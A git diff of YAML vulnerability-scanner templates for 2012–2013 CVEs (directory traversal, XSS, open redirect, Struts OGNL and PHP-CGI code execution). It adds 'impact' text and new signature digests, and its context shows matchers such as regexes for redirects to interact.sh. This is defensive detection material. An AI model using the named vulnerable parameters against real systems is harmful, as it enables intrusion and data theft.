+# digest: 490a0046304402206af9d5437a082136493eb50bae5a2cca921987ff736bc0aa1511fae3d10b352b02205c58f3fb4179c7c0cde24051152d8f79edb60483338dead09ad495395d428d87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml
index dec76c85fe..c5e17f2295 100644
--- a/http/cves/2012/CVE-2012-0996.yaml
+++ b/http/cves/2012/CVE-2012-0996.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/36784
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f84dea5c9153264884fa26ce4059f842dd09fb352df513c493deab6e3ffc82c20221008039d570b0e4e7cb119aa41bdd2d25704873ea821204e87ea27d953c8f8e1243:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022031d3f94d24b3d0f70fdbac9bb5aa6ce3d64935726c0b22eb244045ee63bcd7ab022100a675ebeee4e80933737faac919151326ffe3bc30491219101218ee770e14ccaa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml
index 41a91b7180..32bbc82087 100644
--- a/http/cves/2012/CVE-2012-1226.yaml
+++ b/http/cves/2012/CVE-2012-1226.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
+  impact: |
+    Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: Upgrade to the latest version to mitigate this vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/36873
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100922235435130580e69d43a791b7a6aea5dd2b8b9dd9178547dfd2ca308a43edf02202c57df51fc3da583fd8766dae576310d3fcdc98ca1d64d89ae0fb14cae6531c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d903161db4a66f050d495aa8c3e984263f7ff37e884924f6bb8d94a3060748bd02206cfb74efe3b2162cf198831ba090fa1c4cdacec5beb5689f8166486e88c25c83:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index df93200484..03f626eedf 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
+  impact: |
+    Remote code execution
   remediation: |
     Upgrade to a patched version of PHP or apply the necessary security patches.
   reference:
@@ -47,5 +49,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a004730450221008066cdce18720214ac09d4d19671ec94b8843659b9ec85c84d36a7822f435e5502201ca5e1be58c49a2aff615040432936da67bb8453a9fe4bfe4a91c041fe0bef44:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fa871bad697cfafab48725ec3acf1f122ff655983323458968c2fa6f74207a07022100dcd66b02aefd91501668a7752f8a4c4a77d32a10bbfe55efe4994d8d7fdc6088:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml
index 5054be3846..b3e0bda55b 100644
--- a/http/cves/2012/CVE-2012-1835.yaml
+++ b/http/cves/2012/CVE-2012-1835.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205dd5a5bd2f0159b576e307d90b86b925ec45251b2212bb03655460e26db678e002201274d73ccf5e3fedd3d5f955fda1f90dc3f48bcfcd807208ecd51830ee65298d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a60088dcada482af5029530d3b3d0e51b9af45aa4c0c305a241c89948cd3cc97022100f9cf4f0ca410a0b4479522c797020de7682ea6e26acbf65f9bdae70361ce1f4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml
index 5ae9918e62..a6268c69f2 100644
--- a/http/cves/2012/CVE-2012-2371.yaml
+++ b/http/cves/2012/CVE-2012-2371.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022063cfe684e3680f38834aabb4ac32554f36bef83e45c12814aa5ade55a1272459022011d7b1c446e22aa799cb493ecb96aaecf4818e8e331da50d0fb797e006fe2277:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a451cb95840a08bc92aa3efac38d881cee6f1a25ce47babc654cd59cf8f2a338022100a60670a33e8bd6a0f7155deb1dfd658da441f4dc06d86f733814fa246002afca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml
index 34e75c4b6d..ede1122189 100644
--- a/http/cves/2012/CVE-2012-3153.yaml
+++ b/http/cves/2012/CVE-2012-3153.yaml
@@ -8,6 +8,8 @@ info:
     An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
     11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
     vectors related to Report Server Component.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
   remediation: |
     Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         name: linux_working_path
         regex:
           - "/.*/showenv"
-# digest: 4a0a00473045022100b8455ac21b80a5260e1793e9cd76e78f23f7891f4024746380341e9f77786b7f02201e2ac88f61fa054ab3b8287ef4e92b6cd3aaa054160aa535ffbc2d8485c82dea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206b20c1c55c81fef4dbaafa5d763e6e0080cf0589adcb5fd8ac1bb0d510083d8f022100a140c60aaa3a69d82b3f11e6534dfd0000323e2250e822e9bbe7080ce6e3836e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml
index f89fda1509..47ed6cfce5 100644
--- a/http/cves/2012/CVE-2012-4032.yaml
+++ b/http/cves/2012/CVE-2012-4032.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation.
   remediation: |
     Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4a0a00473045022100edca48fca1d5ab382b01db278a7d30d607a192c0c8a9dbdf103032ecf95f22c502205529150fb4d78cc7a24825f86b84353e0794cad6391d2d70138c160fa5d83bb4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207602543f3bacfca903cf1afb4e30bb166b97caff3605c1cba10cfb3666d79e58022003987bc8f66668eed9e95e4de6bbc0e4ff9b51bb7e87d79d4c124dff966d1d93:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml
index 21c38d55cc..61b4fd7c1e 100644
--- a/http/cves/2012/CVE-2012-4242.yaml
+++ b/http/cves/2012/CVE-2012-4242.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022075906cf3f171030df9198bf0fb45042aa8467d3fc7734a3933db9dbaf2006b6e022100c75f42a3f048659ca7c3796f6d82dc4c26b97c8cdf61e65b3e35071de4cd7db0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d7aa854fa8a07369a25a7f77bdcda2a48c326d87c20b7de041758b4b78e8223d022071ce9f6abcf3c42eebfa1ebc2b4f4ab8d1a07c58afcbead343d3ead480a788f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml
index d8b2940019..2a497a6055 100644
--- a/http/cves/2012/CVE-2012-4253.yaml
+++ b/http/cves/2012/CVE-2012-4253.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206c3037d540cff87adad1e2e7a04f9c875592d8f89b5410fe75fc56a5637af5930221009f476973797ebf91ad697c84cdf2a9cf0231aecf46ce97d00dc02fa6842231b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100af14a5dea698b34ecef70e5a08fb8d0ae4606149ac6ef546f9d4048d328607c1022042569e46d6fc5bc6349128f8650d8422bb936d441378285d4421181a63911748:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml
index fc6c5bb6c8..284cd0a85b 100644
--- a/http/cves/2012/CVE-2012-4273.yaml
+++ b/http/cves/2012/CVE-2012-4273.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f6ed68b186aa2b1a011a6a2dd63793a763d5699387fc7be306baa316b670d3d80220275179eb839f24558b6bc7dffa6cafde837f0198722d08eb23e263bc7a9d5d3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201f895979c53a8a44c41029e255e3e6cca5f42d448ffc075e1ba0c63c0e029a53022016f1b9899f89a74da727b77ab77517a86e107c48714b6eb5b5c531f8fa6d938c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml
index e4884ff4ab..720cccde78 100644
--- a/http/cves/2012/CVE-2012-4547.yaml
+++ b/http/cves/2012/CVE-2012-4547.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+  impact: |
+    Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter.
   reference:
     - https://www.exploit-db.com/exploits/36164
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4547
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022041260fd2e8a49bd7918ca992439833bef1808d32c54a50a302dd26b9828138150221008d045f606bc52beb9fcba1961134340b355b3f0815f7b27872d73c0ed920d661:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202a0794bed7e96c74b5c23e1a33771b5515251a4a11a3bdbf1bbef57faa66dc66022039605f685e93431029581e46a0793016be45d5f85c4c2d2e3a8df4ff8c2d1e4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml
index 169c94dd2e..b72890168b 100644
--- a/http/cves/2012/CVE-2012-4768.yaml
+++ b/http/cves/2012/CVE-2012-4768.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100af51ca112118b69ebacf7878456fe9838392b6b42ce845f319f3a6c4f7fa3717022100a9cddb89069ab0f11d196052337b34f39043edac9d9a3d6b7dc03853de70d6f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ebbe7f5db516dfb9e8d1f9cd08375491e27f7e7a86770cc1fe7315b25d62c95a022100901ba23913216d153ef95886eca13be0f5f29b5d414b8cc55cc303149d624e81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml
index 2ca898b185..469e05ae91 100644
--- a/http/cves/2012/CVE-2012-4878.yaml
+++ b/http/cves/2012/CVE-2012-4878.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
+  impact: |
+    An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d6ab06348554d3e6c050a9e5256169b20d1c7ede5538404fdbfbd439984f57f60220188679716e64ea25f878d495940cbd4dd7b3098f7e747d533792a5e9ac515912:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ce5195819e7865cf1103c9bc43bfb499880a1ddc9fac36f8df36fe36f8f0f96602204c4af856a0ec4128e55a6da648ca13aafb5d73e0771e886e5a811745dd4a129e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml
index f9ca85bfc3..739c473901 100644
--- a/http/cves/2012/CVE-2012-4889.yaml
+++ b/http/cves/2012/CVE-2012-4889.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202c69534a578527559e10b44c7367e0d2757f5579dee33fa91a1b98986693f72d022100e9f694dc24caa3b01abdb83691acbc79caa01d3f2230fed54e139de676856957:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c6c35145fdfc7038b7cf7d21ab7bd2c23207b7b050865d00c256ebd58edf58fa022100a82057de268fce4de55702b67c8f3f09a548ebd9dd9fd06dba78cdecc367f033:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml
index 15ce4fe468..86f4edfdf3 100644
--- a/http/cves/2012/CVE-2012-4940.yaml
+++ b/http/cves/2012/CVE-2012-4940.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
+  impact: |
+    An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server.
   reference:
@@ -40,4 +42,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4b0a00483046022100eec0f93ad04a73deecae7c993ae01e9d0a57efed806fc8ec1bc3f11499953a5c022100b5193a6e7eef2f7918ab4463bcdc76b1719ec271ebaffe0c69c159110ea51ecf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bcb93a85e762a81c4ca7d98ce6b0fe3528962dce21efe81c1e1ee9ba9388b97302207f5783d3f27ff48af2191ffa4aa33643b3c3454f70003c551532af70f9344b2f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml
index 49376f9938..a1cf16545b 100644
--- a/http/cves/2012/CVE-2012-4982.yaml
+++ b/http/cves/2012/CVE-2012-4982.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a00473045022100f019b8be4db54c3d3c58c66926a558b1ac0f2e2717bacd47a43c1844032730fc022063c579e3b48f7b2260a6aafb9a099562216185a74e99f86c0f3d136c39e4872f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009b89a5eb4db723062b612d59daf2a4427a34860705309b3a8ccef0462629664102200aa9e5ac13539f5546a57a93e60a5bfbfb603ecdd27231e5ee4761989aeb6e5c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml
index de0a00b29a..e4cddf5f53 100644
--- a/http/cves/2012/CVE-2012-5321.yaml
+++ b/http/cves/2012/CVE-2012-5321.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection
+  impact: |
+    Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities.
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 4a0a004730450220657fdf02e215924c85fc640d3e15d642d3c3bfc51694397204305a289fab9060022100c7be87d2209034849c0a71b7b246be89ad42ee252e85954efd3f4e334de0c8a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220474532ff614e3a938698419dd51826c9c2d641e33b47fe7f5d14ba903b3ad2bd022100d8e84f66303b745268bb2bbb7a786f1dd37d0c5c8d44583efee33c3b777046a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml
index 421dee850e..2b9e972953 100644
--- a/http/cves/2012/CVE-2012-5913.yaml
+++ b/http/cves/2012/CVE-2012-5913.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100adee9e7dcaf769a8748388a8c02e9f47552a1061276d49b5ad582bba335bca94022043ad9ba4ea16dbb58d3e9de9ed5295c802979cb598e387ec93880e41b6bf9f2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206d1ea36955018c9a5addf005b4ca00aa6fe284b5943dda5d903b7ab128656ded02205f865a67e35c405383882c9ed298b28f63c6252c4a9535e191dddd67a845d74e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml
index cee1dbee0b..b999245b8f 100644
--- a/http/cves/2012/CVE-2012-6499.yaml
+++ b/http/cves/2012/CVE-2012-6499.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
-# digest: 490a004630440220229780e9caa0b15586da171825a5a0fd25d3308d9a744012f1846ee7b29e9c8302203cf21db6e6ee250ad9e402e7349c9d4ab76ff3a3d72d3f04ce4703ed4c903d7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bd8af2517a97063f8f0ad4e7d78cd103cd7d8b32c38589a55980d7328bff66bb0221008316cb7f49de8d01ec1a35a1fd0f9614debd8d666390d579c45273af7cd348fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml
index f9e75572c2..0a0ffb53c8 100644
--- a/http/cves/2013/CVE-2013-1965.yaml
+++ b/http/cves/2013/CVE-2013-1965.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution on the affected server.
   remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
   reference:
     - http://struts.apache.org/development/2.x/docs/s2-012.html
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100db01b2a5e8b5b55577d1b2ea815494413fa46d15c8d57255721ffc4d3239f753022027caf465cc65eed27f746aae579f2f54c80c2d529b23d738d681f61588e1f30b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009903a3e1aa1de4796437c5ec22c7e9fe8f66b6933044675432f04de35069c0c80221009972ae5a17ade6f270b3a89a00754b6b4140d1a8680026e7214026f60f32a517:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml
index e3c21f2f50..1727ea4635 100644
--- a/http/cves/2013/CVE-2013-2248.yaml
+++ b/http/cves/2013/CVE-2013-2248.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+  impact: |
+    An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
   reference:
     - https://www.exploit-db.com/exploits/38666
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a004730450221008cf08226ee47f66378563d2531bcf16d1b7d119faad35c013e7fdd53daf919c702205efd24c07542f82a551cdc3e15b5adcb96ecb558b97734366e5f719f08361707:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205f523eda587cec05282805970bcacd0b1d52ab21c3cd109fb57a9b1576a41139022100d62846038f26508c564256caecfc689384db9ca1b9a2c21706077dbed9480472:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml
index 05c339e230..9e8277fe07 100644
--- a/http/cves/2013/CVE-2013-2251.yaml
+++ b/http/cves/2013/CVE-2013-2251.yaml
@@ -5,6 +5,8 @@ info:
   author: exploitation,dwisiswant0,alex
   severity: critical
   description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
+  impact: |
+    This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system.
   remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
   reference:
     - http://struts.apache.org/release/2.3.x/docs/s2-016.html
@@ -59,4 +61,4 @@ http:
           - 200
           - 400
         condition: or
-# digest: 490a0046304402206119e24ee3f7acb2f071a8e0ab4c041ae406be7c9fd6f915b458b55075e71fab02207006377f00a8f6db8838e954c0e8082334259076d6b1fb35b2d6204b9de43dcd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
